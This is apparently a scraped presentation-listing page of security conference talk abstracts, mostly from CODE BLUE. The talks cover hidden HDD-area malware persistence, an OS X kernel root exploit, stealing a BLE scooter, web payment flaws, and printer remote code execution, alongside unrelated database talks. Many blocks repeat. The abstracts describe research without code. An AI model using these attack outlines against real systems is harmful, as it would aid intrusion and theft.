Hard Disk Drives (HDD) have a hidden space for storing data. If malicious software is stored in this hidden area, it could lead to attacking computers even if they are air-gapped.
By abusing surplus space of HDD, such cyber attack against off-line industrial control systems could become possible.
Moreover, the software or any data in this hidden space can survive against formatting, OS reinstallation, malware destruction software and any conventional cybersecurity framework.
Let us call it "PARADAIS"
While the PARADAIS stays unactivated, LBAs are not mapped to the hidden data area. Therefore, even if the HDD is wiped several times such as 3-pass, 7-pass or 35-pass, it remains there as it is.
There has been no way to detect or erase the unidentified software at PARADAIS in advance when the HDD had been modified prior to your purchase or its installation. However, new solutions are being discovered by my ongoing research.
Who can predict that Windows OS may boot after the HDD is wiped by Enhanced Secure Erase ? It would be you at CODEBLUE2016.
The 2nd part of my presentation would be on DATA RECOVERY from HDD the platter surface of which has been damaged because of head crash, natural disaster or intentional destruction at crime scenes. Survey results of 12 cases show how effective the disk surface cleaning by DDRH was.
--- Dai Shimogaito
He has been researching and developing state-of-the-art data recovery technology for malfunctioning HDDs which had suffered platter damage from head crash, natural disaster and crime.
Dai, as a digital forensic investigator, has also examined digital evidences of murder, abandonment of corpse, internal corporate fraud, and labor management problems and been cooperating with law enforcement and lawyers.
Moreover, as a cyber security researcher, he has been a speaker at CODEBLUE, Matcha139 Workshop, seminars for law enforcement and cyber security companies and HTCIA International Conference & Training Expo ( Aug 2016 ).
Live Memory Forensics on Android devicesNikos Gkogkos
This presentation deals with some RAM forensics on the Android OS using the LiME tool for getting a RAM dump and the Volatility framework for the analysis part!
LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service. This video gives you a high level overview of LDAP and some examples of software that utilize LDAP, such as Active Directory.
Live Memory Forensics on Android devicesNikos Gkogkos
This presentation deals with some RAM forensics on the Android OS using the LiME tool for getting a RAM dump and the Volatility framework for the analysis part!
LDAP stands for Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service. This video gives you a high level overview of LDAP and some examples of software that utilize LDAP, such as Active Directory.
Are your Oracle databases highly available? You have deployed Real Application Clusters (RAC), Data Guard, or Failover Clusters and are well protected against server failures? Great – the prerequisites for a highly available environment are given. However, to assure that backend infrastructure failures also remain transparent to the client, an appropriate configuration is a prerequisite.
This lecture will discuss the Oracle technologies that can be used to achieve automatic client failover functionality. What are the advantages, but also the limitations of these technologies?
A presentation on the Ext4 file system and the evolution of Ext filesystem in Linux operating system. Linux uses virtual filesystem. The comparison of the ext filesystem generations is provided.
Presentation by Lorenzo Mangani of QXIP at the October 26 SF Bay Area ClickHouse meetup
https://www.meetup.com/San-Francisco-Bay-Area-ClickHouse-Meetup
https://qxip.net/
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
Identity und Access Management mit One Identity - Ein ÜberblickIBsolution GmbH
Inhalt:
Identity und Access Management ist Das Thema unserer Zeit. Noch nie war das Software-gestützte managen von Identitäten so wichtig wie in Zeiten von immer häufiger stattfindenden Cyber-Attacken.
In diesem Webinar stellen wir Ihnen ein Tool vor, welches eine starke Verbreitung im Markt erfahren hat - der One Identity Manager aus der One Identity Suite von Quest Software. Er zählt zu den führenden Produkte für das Identity und Access Management. Im Webinar geben wir Ihnen einen Überblick über dessen Leistungsumfang, gehen auf Stärken ein und geben im Rahmen einer Live Demo wertvolle Insights.
Zielgruppe:
- IT-Security Officer, Chief Security Officer (CSO), CIOs
- Prozessverantwortliche im Identity Lifecycle Management bzw. User Lifecycle Management
- IT-Mitarbeiter, zuständig für Rollen und Berechtigungen
Agenda:
1. Einführung - warum jetzt One Identity
2. Überblick über das One Identity Portfolio
3. One Identity Manager Live-Demo und Insights
4. Softwarearchitektur, Zielsysteme und Konnektoren
Mehr über uns:
Website: https://www.ibsolution.com/
Karriereportal: https://ibsolution.de/karriere/
Webinare: https://www.ibsolution.com/academy/webinare
YouTube: https://www.youtube.com/user/IBSolution
LinkedIn: https://de.linkedin.com/company/ibsolution-gmbh
Xing: https://www.xing.com/companies/ibsolutiongmbh
Facebook: https://de-de.facebook.com/IBsolutionGmbH/
Twitter: https://twitter.com/ibsolutiongmbh?lang=de
Instagram: https://www.instagram.com/ibsolution/?hl=de
Weitere Informationen:
https://www.ibsolution.com/academy/webinar-aufzeichnungen/sap-security-user-access-management-in-hybriden-landschaften-mit-sap-identity-provisioning-service
stackconf 2022: Open Source for Better ObservabilityNETWAYS
In the cloud native era systems are getting ever more dynamic and complex. With containers and microservices architecture, monitoring and troubleshooting systems is more challenging than ever before. The open source community has risen up to the challenge and delivered solutions that fit modern environments. Open source projects such as Prometheus and the ELK Stack have gathered massive adoption with developers and DevOps engineers, who also carry this skillset between companies and grow the adoption. New open standards, such as OpenMetrics, OpenTracing and OpenTelemetry, are emerging to converge the industry and prevent vendor lock-in. In this talk I will talk about observability, the recommended open source tools and standards, and how to combine them to help you achieve effective observability in your environment.
Digital forensics is the scientific examination and analysis of data held on or retrieved from, computer storage media in such a way that the information can be used as evidence in a court of law.
Oracle RAC is an option to the Oracle Database Enterprise Edition. At least, this is what it is known for. This presentation shows the many ways in which the stack, which is known as Oracle RAC can be used in the most efficient way for various use cases.
[CB16] (P)FACE :アップルのコアへ、そしてルート権限へのエクスプロイト by Moony Li & Jack TangCODE BLUE
OS Xのセキュリティ脆弱性研究はMacのデバイスが人気になるにつれ、より人気が高まっている。OX XのIOKitはユーザモードからの切り替えにおけるカーネル自身およびカーネル拡張の危殆化によりハッカーからの多くの攻撃にさらされている。多くの研究者はこの分野の研究(リファレンスを参照のこと)を進めており、我々は本研究分野の次のいくつかの成果を共有したい。
1. カーネル脆弱性を検出するためのコンテキストエンライトメントによるパッシブファジングフレームワーク
2. SMAP&SMEPをバイパスするためのユーザモードプログラムからカーネルメモリを占有するためのエクスプロイト技術
3. 本ファジング手法により検出された脆弱性の活用方法とOS Xに対し二度の成功をもたらしたルート詐取のための新たなエクスプロイト手法
我々は次の新たな手法を紹介する。PFACEと呼ばれる、OS X IO Kitに対するコンテキストエンライトメントによるパッシブファジングである。PFACEは次のような特徴を有する。
第一に、条件依存でありシステムクラッシュをもたらすコードの実行および検出を深くまた広く許可する。次に以下が含まれるモジュールを出力する。コンテキスト:脆弱性の疑いに対するインジケーター。インジケーターは最初にモジュールをレビューするための手段としてレビュアーにとって有用であろう。
多くの脆弱性を有する場合、主要な課題はどのようにROPガジェットをユーザモードプログラムからカーネル空間に転送するかである。なぜなら近年のOS XではSMAPおよびSMEPを許可しているためである。高名なセキュリティ研究者であるステファン・エッサーはOSDataはカーネルメモリを占拠する良い構造であると提案している。[リファレンスセクション5]もちろんOSDataは確かによいデータ構造である。しかし、実際にはOSDataが機能しないいくつかの課題が存在する。我々はOSDATAがユーザモードプログラムからカーネルメモリを占拠するよう機能させるための新たな手法を発見し、本手法により、新たな脆弱性の検出およびOS X (10.11.3) のルート詐取に成功している。
実際に我々はCVEにおける多くの脆弱性を発見しており、ファジング効果によるカーネルクラッシュを実現している。また、我々はMac OS X(10.11.3)においていくつかの脆弱性を使って、二つの異なるローカル権限昇格手法を確立している。
--- Moony Li & Jack Tang
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...CODE BLUE
Smartphones are commonly used as the controller and Internet gateway for BLE-enabled IoT devices. Designing a strong authentication protocol between them is the key part of IoT security. However mobile app design has many challenges such as limited input & output interfaces as well as user privacy protection features. Due to these restrictions, many vendors has given-up BLE's build-in security manager protocol and choose to build their own authentication protocols.
This study focused on a generalized method to analyze these BLE authentication protocols, discovering and solving challenges mentioned above. We applied this method on commercial products, including popular Gogoro Smart Scooter from Taiwan. We will demo under some certain circumstances it is possible to dump key used to unlock your Gogoro Scooter and send fake BLE authentication protocol packets to steal the scooter.
--- Chen-yu Dai [GD]
Chen-yu Dai (GD) is CTO at Team T5 Research, providing Digital Forensics & Incident Response services, developing Threat Intelligence Program and Platforms, consulting enterprise cyber defenses.
He is studying at the graduate school of Department of Information Management in the National Taiwan University of Science and Technology.
He also volunteered as deputy coordinator of HITCON, the largest hacker community and security conference in Taiwan.
He has received many prizes from domestic and international CTFs, as well as bug bounty programs.
--- Shi-Cho Cha [CSC]
Professor Shi-Cho Cha [CSC]
Shi-Cho Cha (CSC) is currently an associate professor at the Department of Information Management in the National Taiwan University of Science and Technology, where he has been a faculty member since 2006. He received his B.S. and Ph.D. in Information Management from the National Taiwan University in 1996 and 2003. He is a certified PMP, CISSP, CCFP and CISM. From 2000~2003.
He was a senior consultant in eLand technologies and played the role of project leaders to develop several systems about e-marketing. From 2003~2006, he was a manager at PricewaterhouseCoopers, Taiwan and helped several major government agencies to develop their information security management systems.
Recently, he helped NTUST to establish security analysis workforce and help several organizations to evaluate their system security. His current research interests are in the area information security management, identity management, smartphone security, and IoT security.
Are your Oracle databases highly available? You have deployed Real Application Clusters (RAC), Data Guard, or Failover Clusters and are well protected against server failures? Great – the prerequisites for a highly available environment are given. However, to assure that backend infrastructure failures also remain transparent to the client, an appropriate configuration is a prerequisite.
This lecture will discuss the Oracle technologies that can be used to achieve automatic client failover functionality. What are the advantages, but also the limitations of these technologies?
A presentation on the Ext4 file system and the evolution of Ext filesystem in Linux operating system. Linux uses virtual filesystem. The comparison of the ext filesystem generations is provided.
Presentation by Lorenzo Mangani of QXIP at the October 26 SF Bay Area ClickHouse meetup
https://www.meetup.com/San-Francisco-Bay-Area-ClickHouse-Meetup
https://qxip.net/
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well, these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding with environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
Identity und Access Management mit One Identity - Ein ÜberblickIBsolution GmbH
Inhalt:
Identity und Access Management ist Das Thema unserer Zeit. Noch nie war das Software-gestützte managen von Identitäten so wichtig wie in Zeiten von immer häufiger stattfindenden Cyber-Attacken.
In diesem Webinar stellen wir Ihnen ein Tool vor, welches eine starke Verbreitung im Markt erfahren hat - der One Identity Manager aus der One Identity Suite von Quest Software. Er zählt zu den führenden Produkte für das Identity und Access Management. Im Webinar geben wir Ihnen einen Überblick über dessen Leistungsumfang, gehen auf Stärken ein und geben im Rahmen einer Live Demo wertvolle Insights.
Zielgruppe:
- IT-Security Officer, Chief Security Officer (CSO), CIOs
- Prozessverantwortliche im Identity Lifecycle Management bzw. User Lifecycle Management
- IT-Mitarbeiter, zuständig für Rollen und Berechtigungen
Agenda:
1. Einführung - warum jetzt One Identity
2. Überblick über das One Identity Portfolio
3. One Identity Manager Live-Demo und Insights
4. Softwarearchitektur, Zielsysteme und Konnektoren
Mehr über uns:
Website: https://www.ibsolution.com/
Karriereportal: https://ibsolution.de/karriere/
Webinare: https://www.ibsolution.com/academy/webinare
YouTube: https://www.youtube.com/user/IBSolution
LinkedIn: https://de.linkedin.com/company/ibsolution-gmbh
Xing: https://www.xing.com/companies/ibsolutiongmbh
Facebook: https://de-de.facebook.com/IBsolutionGmbH/
Twitter: https://twitter.com/ibsolutiongmbh?lang=de
Instagram: https://www.instagram.com/ibsolution/?hl=de
Weitere Informationen:
https://www.ibsolution.com/academy/webinar-aufzeichnungen/sap-security-user-access-management-in-hybriden-landschaften-mit-sap-identity-provisioning-service
stackconf 2022: Open Source for Better ObservabilityNETWAYS
In the cloud native era systems are getting ever more dynamic and complex. With containers and microservices architecture, monitoring and troubleshooting systems is more challenging than ever before. The open source community has risen up to the challenge and delivered solutions that fit modern environments. Open source projects such as Prometheus and the ELK Stack have gathered massive adoption with developers and DevOps engineers, who also carry this skillset between companies and grow the adoption. New open standards, such as OpenMetrics, OpenTracing and OpenTelemetry, are emerging to converge the industry and prevent vendor lock-in. In this talk I will talk about observability, the recommended open source tools and standards, and how to combine them to help you achieve effective observability in your environment.
Digital forensics is the scientific examination and analysis of data held on or retrieved from, computer storage media in such a way that the information can be used as evidence in a court of law.
Oracle RAC is an option to the Oracle Database Enterprise Edition. At least, this is what it is known for. This presentation shows the many ways in which the stack, which is known as Oracle RAC can be used in the most efficient way for various use cases.
[CB16] (P)FACE :アップルのコアへ、そしてルート権限へのエクスプロイト by Moony Li & Jack TangCODE BLUE
OS Xのセキュリティ脆弱性研究はMacのデバイスが人気になるにつれ、より人気が高まっている。OX XのIOKitはユーザモードからの切り替えにおけるカーネル自身およびカーネル拡張の危殆化によりハッカーからの多くの攻撃にさらされている。多くの研究者はこの分野の研究(リファレンスを参照のこと)を進めており、我々は本研究分野の次のいくつかの成果を共有したい。
1. カーネル脆弱性を検出するためのコンテキストエンライトメントによるパッシブファジングフレームワーク
2. SMAP&SMEPをバイパスするためのユーザモードプログラムからカーネルメモリを占有するためのエクスプロイト技術
3. 本ファジング手法により検出された脆弱性の活用方法とOS Xに対し二度の成功をもたらしたルート詐取のための新たなエクスプロイト手法
我々は次の新たな手法を紹介する。PFACEと呼ばれる、OS X IO Kitに対するコンテキストエンライトメントによるパッシブファジングである。PFACEは次のような特徴を有する。
第一に、条件依存でありシステムクラッシュをもたらすコードの実行および検出を深くまた広く許可する。次に以下が含まれるモジュールを出力する。コンテキスト:脆弱性の疑いに対するインジケーター。インジケーターは最初にモジュールをレビューするための手段としてレビュアーにとって有用であろう。
多くの脆弱性を有する場合、主要な課題はどのようにROPガジェットをユーザモードプログラムからカーネル空間に転送するかである。なぜなら近年のOS XではSMAPおよびSMEPを許可しているためである。高名なセキュリティ研究者であるステファン・エッサーはOSDataはカーネルメモリを占拠する良い構造であると提案している。[リファレンスセクション5]もちろんOSDataは確かによいデータ構造である。しかし、実際にはOSDataが機能しないいくつかの課題が存在する。我々はOSDATAがユーザモードプログラムからカーネルメモリを占拠するよう機能させるための新たな手法を発見し、本手法により、新たな脆弱性の検出およびOS X (10.11.3) のルート詐取に成功している。
実際に我々はCVEにおける多くの脆弱性を発見しており、ファジング効果によるカーネルクラッシュを実現している。また、我々はMac OS X(10.11.3)においていくつかの脆弱性を使って、二つの異なるローカル権限昇格手法を確立している。
--- Moony Li & Jack Tang
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...CODE BLUE
Smartphones are commonly used as the controller and Internet gateway for BLE-enabled IoT devices. Designing a strong authentication protocol between them is the key part of IoT security. However mobile app design has many challenges such as limited input & output interfaces as well as user privacy protection features. Due to these restrictions, many vendors has given-up BLE's build-in security manager protocol and choose to build their own authentication protocols.
This study focused on a generalized method to analyze these BLE authentication protocols, discovering and solving challenges mentioned above. We applied this method on commercial products, including popular Gogoro Smart Scooter from Taiwan. We will demo under some certain circumstances it is possible to dump key used to unlock your Gogoro Scooter and send fake BLE authentication protocol packets to steal the scooter.
--- Chen-yu Dai [GD]
Chen-yu Dai (GD) is CTO at Team T5 Research, providing Digital Forensics & Incident Response services, developing Threat Intelligence Program and Platforms, consulting enterprise cyber defenses.
He is studying at the graduate school of Department of Information Management in the National Taiwan University of Science and Technology.
He also volunteered as deputy coordinator of HITCON, the largest hacker community and security conference in Taiwan.
He has received many prizes from domestic and international CTFs, as well as bug bounty programs.
--- Shi-Cho Cha [CSC]
Professor Shi-Cho Cha [CSC]
Shi-Cho Cha (CSC) is currently an associate professor at the Department of Information Management in the National Taiwan University of Science and Technology, where he has been a faculty member since 2006. He received his B.S. and Ph.D. in Information Management from the National Taiwan University in 1996 and 2003. He is a certified PMP, CISSP, CCFP and CISM. From 2000~2003.
He was a senior consultant in eLand technologies and played the role of project leaders to develop several systems about e-marketing. From 2003~2006, he was a manager at PricewaterhouseCoopers, Taiwan and helped several major government agencies to develop their information security management systems.
Recently, he helped NTUST to establish security analysis workforce and help several organizations to evaluate their system security. His current research interests are in the area information security management, identity management, smartphone security, and IoT security.
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
[CB16] Using the CGC’s fully automated vulnerability detection tools in secur...CODE BLUE
End-user’s requirements for secure IT products are continually increased in environment that are affected directly to human life and industry such as IoT, CPS. Because vendors and end-user sell or buy products based on trustworthy or objective security evaluation results, security evaluation roles are important. Security Evaluations are divided to two parts, one is evaluation on design level such as ISO/IEC 29128(Verification of Cryptographic Protocols) and another one is post-implementation level such as ISO/IEC 15408(Common Criteria). These security evaluation standards, both ISO/IEC 29128 and ISO/IEC 15408, advise to use formal verification and automated tools when high assurance level of target products is required.
For a long time, vulnerability detection using automated tools have been tried and studied by many security researchers and hackers. And recently, the study related to automated vulnerability detection are now more active than ever in hacking community with DARPA’s CGC(Cyber Grand Challenge). But, too many tools are developed continually and usually each tool has their own purpose to use, so it’s hard to achieve ultimate goal of security evaluation effectively and verify evaluation results.
Furthermore, there are no references for categorizing about automated tools on perspective of security evaluations. So, in this presentation we will list up, categorize and analyze all of automated tools for vulnerability detection and introduce our result such as pros and cons, purpose, effectiveness, etc.
-- InHyuk Seo
My name is Inhyuk Seo(Nick: inhack). I graduated B.S. in Computer Science and Engineering at Hanyang University(ERICA) in 2015. Now I’m a researcher and M.S. of SANE(Security Analaysis aNd Evaluation) Lab at Korea University. I’m interested in Programming Language, Software Testing, Machine Learning, Artificial Intelligence.
In 2012, I completed high-quality information security education course “the Best of the Best(BoB)” hosted by KITRI(Korea Information Technology Research Institute) and conducted “Exploit Decoder for Obfuscated Javascript” Project.
I participated in many projects related with vulnerability analysis. I conducted “Smart TV Vulnerability Analysis and Security Evaluation” and “Developing Mobile Security Solution(EAL4) for Military Environment ”. Also, I participated in vulnerability analysis project for IoT products of various domestic tele-communications.
-- Jisoo Park
Jisoo Park graduated with Dongguk University B.S in Computer science engineering. He participated in secure coding research project in Programming Language Lab and KISA(Korea Internet & Security Agency). He worked as a software QA tester at anti-virus company Ahnlab. He also completed high-quality information security education course “Best of the Best” hosted by KITRI(Korea Information Technology Research Institute) and conducted security consulting for Car sharing service company.
Now, Jisoo Park is a
Preventing hard disk firmware manipulation attack and disaster recovery by Da...CODE BLUE
In this talk I will explain strategies prior to and after a hard disk has lost its ability to be used as a storage device due to human manipulation or natural disaster that will allow a high possibility of data recovery. The clicking sound of the hard disk's head is synonymous with hard disk failure , however its is not widely know that this clicking sound can happen even when there is nothing wrong with the head. Changing the hard disk's head merely because it is acting up is a very risky action because it can increase the dangers of damaging the clean insides of a hard disk. So what is causing the hard disk's head clicking sound? The answer is a damaged firmware. At this talk I will explain how to utilize the firmware to control the device and use in a disaster recovery situation.
Dai Shimogaito
CEO of Osaka Data Recovery Founded in 1998. Director of Data Recovery Association Japan.
Wanting to perfect data recovery methods conducts research and information exchange with engineers domestically and internationally.
Trainings : Data Recovery Trainings for NPA and IDF Seminars etc.,
Lectures : Digital Forensic Study Groups, NTT Secure Platform Laboratories, and privately for companies and governments
The newest western digital hard drive repair doctorChez Ludovic
This newest western digital hard drive repair doctor repairs firmware corruption, clear passwords, modify capacity, SN number, etc and helps to fix your undetected PC problems.
This book is written by Ann Leflore with great Hitachi/IBM data recovery knowledge, tips and case studies and will definitely add to your hitachi data recovery success rate.
Btrfs and Snapper - The Next Steps from Pure Filesystem Features to Integrati...Gábor Nyers
These are the slides of our SUSECon 2013 presentation with Arvin (the inventor of Snapper)
Btrfs as technology has been getting a lot of attention over the past few years. While interesting for its feature set alone, like checksums, copy on write, snapshots and built-in device management, without proper management tooling and integration with other parts of the operating system, it is difficult for the average user to use Btrfs to its full potential.
This session will help you understand the features of Btrfs and how Snapper can be used for snapshot management in SUSE Linux Enterprise. We also will provide use cases and an outlook for future functionality.
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
It started with computer hacking and Japanese linguistics as a kid. Zach Mathis has been based in Kobe, Japan, and has performed both red team services as well as blue team incident response and defense consultation for major Japanese global Japanese corporations since 2006. He is the founder of Yamato Security, one of the largest and most popular hands-on security communities in Japan, and has been providing free training since 2012 to help improve the local security community. Since 2016, he has been teaching security for the SANS institute and holds numerous GIAC certifications. Currently, he is working with other Yamato security members to provide free and open-source security tools to help security analysts with their work.
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
Most 5G networks are built in fundamentally new ways, opening new hacking avenues.
Mobile networks have so far been monolithic systems from big vendors; now they become open vendor-mixed ecosystems. Networks are rapidly adopting cloud technologies including dockerization and orchestration. Cloud hacking techniques become highly relevant to mobile networks.
The talk dives into the hacking potential of the technologies needed for these open networks. We illustrate the security challenges with vulnerabilities we found in real-world networks.
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
Printer has become one of the essential devices in the corporate intranet for the past few years, and its functionalities have also increased significantly. Not only print or fax, cloud printing services like AirPrint are also being supported as well to make it easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use it to print some internal business documents of the company, which makes it even more important to keep the printer safe.
Nowadays, most of the printers on the market do not have to be connected with USB or traditional cable. As long as you are using a LAN cable connected to the intranet, the computer can find and use the printer immediately. Most of them are based on protocols such as SLP and LLMNR. But is it really safe when vendors adopt those protocols? Furthermore, many printers do not use traditional Linux systems, but use RTOS(Real-Time Operating System) instead, how will this affect the attacker?
In this talk, we will use Canon ImageCLASS MF644Cdw and HP Color LaserJet Pro MFP M283fdw as case study, showing how to analyze and gain control access to the printer. We will also demonstrate how to use the vulnerabilities to achieve RCE in RTOS in unauthenticated situations.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-...CODE BLUE
